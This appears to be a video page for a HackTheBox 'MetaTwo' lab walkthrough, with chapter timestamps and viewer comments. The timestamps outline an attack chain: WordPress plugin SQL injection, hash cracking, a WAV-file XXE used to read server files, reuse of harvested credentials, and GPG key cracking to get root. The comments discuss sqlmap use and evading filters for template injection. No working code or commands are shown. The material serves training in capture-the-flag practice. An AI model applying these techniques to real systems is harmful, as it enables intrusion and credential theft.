HackTheBox - MetaTwo

Рет қаралды 18,157

Күн бұрын

00:00 - Introduction
01:00 - Start of nmap, attempting to login with FTP then going to the website
02:45 - Running WPScan with enumerate all plugins in aggressive mode
04:00 - Taking a look at the site while WPScan runs and finding a plugin (BookingPress-Appointment-Booking) and finding an exploit
06:15 - Replacing the NONCE in the exploit to get it working
09:00 - Using SQLMap to dump everything, while we attempt to get only the data we think we are interested in.
11:00 - Manually dumping the WP_USERS table with the SQL Injection
13:25 - Cracking the wordpress hashes to get a user credential
16:57 - EDIT: Playing with SQLMap to get it to dump this database
23:30 - Searching for Wordpress 5.6.2 exploits, discovering an XXE in WAV Files
25:20 - Using the XXE to exfil files off the webserver
30:20 - Discovering FTP Credentials in the WP Config, logging into the FTP Server and finding SSH Credentials
32:40 - Logging in as JNelson and seeing PassPie, which is a CLI Password Manager that uses PGP/GPG Keys
34:30 - Cracking to PGP/GPG Key with John and getting root

Пікірлер: 39

@elrich3068 Жыл бұрын

37:33 Hackers forgetting to update their tools and companies forgetting to update their packages. Never though I would have those two things in the same sentence :) Just joking great video, really like the sqlmap debugging segment.

@pepemunic3661 Жыл бұрын

like always, thanks man

@NeverGiveUpYo Жыл бұрын

Love your content dude

@time_to_play_007 Жыл бұрын

Это было мощно! Спасибо!

@nuridincersaygili Жыл бұрын

Thanks for the content! When I see the foothold exploit, I expect a python script to automize the progress :)

@lonelyorphan9788 Жыл бұрын

Ippsec rocks!!! 🙂

@mohamedtahahnichi2738 Жыл бұрын

First❤

@DHIRAL2908 Жыл бұрын

Couldn't we have just replaced the admin hash using the SQLi, and edited a PHP to get RCE?

@GajendraMahat Жыл бұрын

is it works??

@0x1sac Жыл бұрын

That's a good idea, that technique is usually called "stacked queries". It is generally not possible to do this in a traditional SQL injection vulnerability on MySQL, as you are restricted by the context of the original query. If we could do stacked queries, it would probably have worked.

@kalidsherefuddin Жыл бұрын

Thanks

@tg7943 Жыл бұрын

Push!

@dadamnmayne Жыл бұрын

would a hardcoded nonce be considered a vulnerability?

@AUBCodeII Жыл бұрын

Ipp, you should name a box Toy Story 4

@yuyu-ce4fz Жыл бұрын

Thank

@_hackwell Жыл бұрын

I usually don't have much success with sqlmap so I end up doing the injection manually. What's the point of having a tool which needs you to specify the method and the injection point?

@randomnickname00 Жыл бұрын

I mean, injection point then you need to know it anyway, even if you do it manually. About specifying the method, you don't really have to, but it's useful if you want to try for some really specific method, working on a time based injection can really be a pain for example, so you can try to search for error based injection, union, etc.

@_hackwell Жыл бұрын

@@randomnickname00 when you provide a curl request to sqlmap , it should identify the injection point. Box creators tend to write code that fools sqlmap so one could easily miss a vulnerability relying only on the tool and that's what Ippsec showed in this video. Same goes with gobuster. I tend to use wfuzz instead

@ANTGPRO Жыл бұрын

Automatization it’s a point.

@_hackwell Жыл бұрын

@@ANTGPRO yup exactly. No tool can replace a hacker 😁

@randomnickname00 Жыл бұрын

@@_hackwell Oh, you meant this, sorry thought you were talking about the endpoint, like /vulnerable.php for example

@sams7888 Жыл бұрын

Next the inject machine please

@victorkuria4734 Жыл бұрын

using a '-p' to specify a parameter will less than likely cause sqlmap to ever fail, instead of adding a * in the request..but again you seem to not have your tools updated xD

@bmdyy Жыл бұрын

First

@pranavarora250 Жыл бұрын

how did you run hashcat so fast ? Ik on VM its slow but it takes ages for me to run

@magikarpslapper759 Жыл бұрын

He's probably got it hooked up to a beefy graphics card. The difference between my CPU and my 1080 is insane.

@magikarpslapper759 Жыл бұрын

Also I think VMs need to be configured to allow GPUs to be used. If you use a GPU with the VM, I think it can't be used for the main machine at the same time.

@gandelgerlant565 Жыл бұрын

Exaclty, you need to enable GPU pass-through to have native performance

@flrn84791 Жыл бұрын

He obviously doesn't run it on a VM, but on a dedicated cracking machine...

@Horstlicious 2 ай бұрын

@@flrn84791 He explained (13:18 -13:37) that the kraken is another box on his local network he uses, because cracking hashes in a vm is slow.

@boogieman97 Жыл бұрын

Hi Ippsec, how would you do a jinja2 SSTI in an HTML email form, where length of input is max 60 characters and common characters used in a SSTI are not passing the email validation, like parentheses and square brackets, forward and back slashes. Any type of encoding / double encoding results in an internal server error.

@ammarabu5mes271 4 ай бұрын

What is the Kracken ? I am kinda lost here.

@Horstlicious 2 ай бұрын

He explained (13:18 -13:37) that the kracken is another box on his local network he uses, because cracking hashes in a vm is slow. He probably (just my assumption!) uses a gpu there.